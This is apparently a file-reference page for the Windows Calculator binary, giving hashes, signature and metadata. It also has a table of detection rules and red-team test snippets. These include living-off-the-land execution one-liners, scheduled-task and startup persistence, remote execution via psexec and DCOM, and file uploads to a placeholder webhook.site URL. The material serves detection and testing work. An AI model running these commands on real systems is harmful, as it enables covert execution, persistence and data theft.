calc.exe
- File Path: C:\Windows\SysWOW64\calc.exe
- Description: Windows Calculator
Hashes
Type | Hash |
---|---|
MD5 | 60FF7F830695B46E4E978968D9A995FE |
SHA1 | B24FDB248D36D0AB86675169414AB8FED4A21A88 |
SHA256 | 381A38D6E7A146B99E2BE866B9E95FFE31F0DCFCEC62272C7C0D6B7114C9227F |
SHA384 | 50DEE8E0221BFC188A90C1F206FDE459C2C9E76BA229C8501CAD99B617AE3E264CF7C1FF8D6C63069FDE7BDC3197A723 |
SHA512 | F5D5AF45DAC59C4F2602F13608C7F346D114A1E4A5D12B029D75D970E0CB6CFCF39AD3F5B49FAC08CDCF036A2C02EABFCFEA828F3808F1033ADDD245C1000AB7 |
SSDEEP | 384:dz6kMrov88/sYWS0YWbiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiLiiiiiriiiI:dV7/s1G |
IMP | BA072A972FE6C47C8CF7A0347BB0AF7A |
PESHA1 | 12478E95FC8A1BEF2D99344A17AF7C97481104E7 |
PE256 | 5023ED42968DA7B12DC4343CA409741A2222DD9F68289765BCB2783A30FDC168 |
Runtime Data
Child Processes:
win32calc.exe
Loaded Modules:
Path |
---|
C:\Windows\SYSTEM32\ntdll.dll |
C:\Windows\System32\wow64.dll |
C:\Windows\System32\wow64cpu.dll |
C:\Windows\System32\wow64win.dll |
C:\Windows\SysWOW64\calc.exe |
Signature
- Status: Signature verified.
- Serial: 33000001C422B2F79B793DACB20000000001C4
- Thumbprint: AE9C1AE54763822EEC42474983D8B635116C8452
- Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: CALC.EXE
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 10.0.17763.1 (WinBuild.160101.0800)
- Product Version: 10.0.17763.1
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
- Machine Type: 32-bit
File Scan
- VirusTotal Detections: 0/71
- VirusTotal Link: https://www.virustotal.com/gui/file/381a38d6e7a146b99e2be866b9e95ffe31f0dcfcec62272c7c0d6b7114c9227f/detection/
File Similarity (ssdeep match)
Possible Misuse
The following table contains possible examples of calc.exe being misused. While calc.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
Source | Source File | Example | License |
---|---|---|---|
sigma | proc_creation_win_susp_calc.yml | description: Detects suspicious use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion | DRL 1.0 |
sigma | proc_creation_win_susp_calc.yml | CommandLine\|contains: '\calc.exe ' | DRL 1.0 |
sigma | proc_creation_win_susp_calc.yml | Image\|endswith: '\calc.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml | - https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf | DRL 1.0 |
sigma | proc_creation_win_susp_system_user_anomaly.yml | - '\calc.exe' | DRL 1.0 |
LOLBAS | Explorer.yml | - Command: explorer.exe calc.exe | |
LOLBAS | Explorer.yml | Description: 'Executes calc.exe as a subprocess of explorer.exe.' | |
LOLBAS | Gpup.yml | - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe | |
LOLBAS | Nvudisp.yml | - Command: Nvudisp.exe System calc.exe | |
LOLBAS | Nvudisp.yml | Description: Execute calc.exe as a subprocess. | |
LOLBAS | Nvudisp.yml | - Command: Nvudisp.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe\","","c:\windows\system32\" | |
LOLBAS | Nvuhda6.yml | - Command: nvuhda6.exe System calc.exe | |
LOLBAS | Nvuhda6.yml | Description: Execute calc.exe as a subprocess. | |
LOLBAS | Nvuhda6.yml | - Command: nvuhda6.exe CreateShortcut test.lnk,"Test","C:\Windows\System32\calc.exe","","C:\Windows\System32\" | |
LOLBAS | Nvuhda6.yml | - Command: nvuhda6.exe KillApp calc.exe | |
LOLBAS | Usbinst.yml | Description: Execute calc.exe through DefaultInstall Section Directive in INF file. | |
LOLBAS | Bash.yml | - Command: bash.exe -c calc.exe | |
LOLBAS | Bash.yml | Description: Executes calc.exe from bash.exe | |
LOLBAS | ConfigSecurityPolicy.yml | - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile | |
LOLBAS | DataSvcUtil.yml | - Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile | |
LOLBAS | Diskshadow.yml | - Command: diskshadow> exec calc.exe | |
LOLBAS | Explorer.yml | - Command: explorer.exe /root,"C:\Windows\System32\calc.exe" | |
LOLBAS | Explorer.yml | Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe | |
LOLBAS | Extrac32.yml | - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe | |
LOLBAS | Extrac32.yml | Description: Command for copying calc.exe to another folder | |
LOLBAS | Forfiles.yml | - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | |
LOLBAS | Forfiles.yml | Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder. | |
LOLBAS | Ftp.yml | - Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt | |
LOLBAS | Hh.yml | - Command: HH.exe c:\windows\system32\calc.exe | |
LOLBAS | Hh.yml | Description: Executes calc.exe with HTML Help. | |
LOLBAS | Pcalua.yml | - Command: pcalua.exe -a calc.exe | |
LOLBAS | Rundll32.yml | Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. | |
LOLBAS | Rundll32.yml | - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} | |
LOLBAS | Rundll32.yml | Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. | |
LOLBAS | Scriptrunner.yml | - Command: Scriptrunner.exe -appvscript calc.exe | |
LOLBAS | Scriptrunner.yml | Description: Executes calc.exe | |
LOLBAS | Ttdinject.yml | - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe" | |
LOLBAS | Ttdinject.yml | - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" | |
LOLBAS | Tttracer.yml | - Command: tttracer.exe C:\windows\system32\calc.exe | |
LOLBAS | Wlrmdr.yml | - Command: "wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u calc.exe" | |
LOLBAS | Wlrmdr.yml | Description: Execute calc.exe with wlrmdr.exe as parent process | |
LOLBAS | Advpack.yml | - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe | |
LOLBAS | Advpack.yml | - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" | |
LOLBAS | Ieadvpack.yml | - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe | |
LOLBAS | Ieadvpack.yml | - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" | |
LOLBAS | Pcwutl.yml | - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe | |
LOLBAS | Setupapi.yml | - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf | |
LOLBAS | Setupapi.yml | - Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf | |
LOLBAS | Url.yml | - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe | |
LOLBAS | Zipfldr.yml | - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe | |
LOLBAS | Manage-bde.yml | - Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf | |
LOLBAS | Appvlp.yml | - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" | |
LOLBAS | Sqltoolsps.yml | - Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe | |
LOLBAS | Vsjitdebugger.yml | - Command: Vsjitdebugger.exe calc.exe | |
LOLBAS | Vsjitdebugger.yml | Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe. | |
LOLBAS | Wsl.yml | - Command: wsl.exe -e /mnt/c/Windows/System32/calc.exe | |
LOLBAS | Wsl.yml | Description: Executes calc.exe from wsl.exe | |
atomic-red-team | problem_report.md | e.g. The atomic test executes and calc.exe is launched. | MIT License. © 2018 Red Canary |
atomic-red-team | T1021.003.md | Upon successful execution, cmd will spawn calc.exe on a remote computer. | MIT License. © 2018 Red Canary |
atomic-red-team | T1021.003.md | [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") | MIT License. © 2018 Red Canary |
atomic-red-team | T1027.004.md | \| input_file \| C# code that launches calc.exe from a hidden cmd.exe Window \| Path \| PathToAtomicsFolder\T1027.004\src\calc.cs\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1036.003.md | \| exe_path \| path to exe to use when creating masquerading files \| Path \| C:\Windows\System32\calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1053.005.md | schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" | MIT License. © 2018 Red Canary |
atomic-red-team | T1053.005.md | schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe" | MIT License. © 2018 Red Canary |
atomic-red-team | T1053.005.md | $Action = New-ScheduledTaskAction -Execute "calc.exe" | MIT License. © 2018 Red Canary |
atomic-red-team | T1106.md | Execute program by leveraging Win32 APIs. By default, this will launch calc.exe from the command prompt. | MIT License. © 2018 Red Canary |
atomic-red-team | T1112.md | \| new_executable \| New executable to run on startup instead of Windows Defender \| String \| calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1134.004.md | calc.exe will be launched. | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | \| executable \| name of executable \| Path \| C:\Windows\System32\calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1140.md | \| executable \| name of executable/file to decode \| Path \| C:\Windows\System32\calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1202.md | Upon execution, calc.exe should open | MIT License. © 2018 Red Canary |
atomic-red-team | T1202.md | \| payload_path \| Path to payload \| Path \| C:\Windows\System32\calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1202.md | \| process \| Process to execute \| String \| calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1202.md | "This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe" | MIT License. © 2018 Red Canary |
atomic-red-team | T1202.md | Upon execution calc.exe will be opened. | MIT License. © 2018 Red Canary |
atomic-red-team | T1204.002.md | Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. | MIT License. © 2018 Red Canary |
atomic-red-team | T1204.002.md | $macrocode = " Open "#{bat_path} " For Output As #1n Write #1, "calc.exe" n Close #1n a = Shell( "cmd.exe /c $bat_path ", vbNormalFocus) n" | MIT License. © 2018 Red Canary |
atomic-red-team | T1204.002.md | and pull down the script and execute it. By default the payload will execute calc.exe on the system. | MIT License. © 2018 Red Canary |
atomic-red-team | T1216.md | Upon execution, calc.exe will be launched. | MIT License. © 2018 Red Canary |
atomic-red-team | T1216.md | \| command_to_execute \| A command to execute. \| Path \| %windir%\System32\calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.md | \| powershell_code \| PowerShell code to execute \| String \| Start-Process calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.md | Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.md | Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.001.md | Upon execution calc.exe will open | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.002.md | Upon execution calc.exe will be launched | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.005.md | Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.005.md | Execute an arbitrary remote HTA. Upon execution calc.exe will be launched. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.010.md | windows defender real-time protection to fix it. Upon execution, calc.exe will be launched. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | Upon execution calc.exe will be launched | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | \| command_to_execute \| Command for rundll32.exe to execute \| String \| calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | Upon successful execution, Calc.exe will spawn. | MIT License. © 2018 Red Canary |
atomic-red-team | T1546.012.md | \| target_binary \| Binary To Attach To \| Path \| C:\Windows\System32\calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1546.013.md | Appends a start process cmdlet to the current user's powershell profile that points to a malicious executable. Upon execution, calc.exe will be launched. | MIT License. © 2018 Red Canary |
atomic-red-team | T1546.013.md | \| exe_path \| Path the malicious executable \| Path \| calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1547.001.md | $Target = "C:\Windows\System32\calc.exe" | MIT License. © 2018 Red Canary |
atomic-red-team | T1547.001.md | $ShortcutLocation = "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk" | MIT License. © 2018 Red Canary |
atomic-red-team | T1547.001.md | Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore | MIT License. © 2018 Red Canary |
atomic-red-team | T1547.009.md | Upon execution, calc.exe will be launched. | MIT License. © 2018 Red Canary |
atomic-red-team | T1547.009.md | echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} | MIT License. © 2018 Red Canary |
atomic-red-team | T1559.002.md | {DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe" } | MIT License. © 2018 Red Canary |
atomic-red-team | T1559.002.md | 9. DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe" | MIT License. © 2018 Red Canary |
atomic-red-team | T1564.md | This module extracts a binary (calc.exe) from inside of another binary. | MIT License. © 2018 Red Canary |
atomic-red-team | T1564.003.md | Upon execution a hidden PowerShell window will launch calc.exe | MIT License. © 2018 Red Canary |
atomic-red-team | T1564.003.md | \| powershell_command \| Command to launch calc.exe from a hidden PowerShell Window \| String \| powershell.exe -WindowStyle hidden calc.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1569.002.md | Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost). | MIT License. © 2018 Red Canary |
atomic-red-team | T1569.002.md | #{psexec_exe} \#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe" | MIT License. © 2018 Red Canary |
atomic-red-team | T1574.002.md | Upon execution, calc.exe will be opened. | MIT License. © 2018 Red Canary |
signature-base | thor-webshells.yar | $s7 = """%windir%\\calc.exe"")" | CC BY-NC 4.0 |
MIT License. Copyright (c) 2020-2021 Strontic.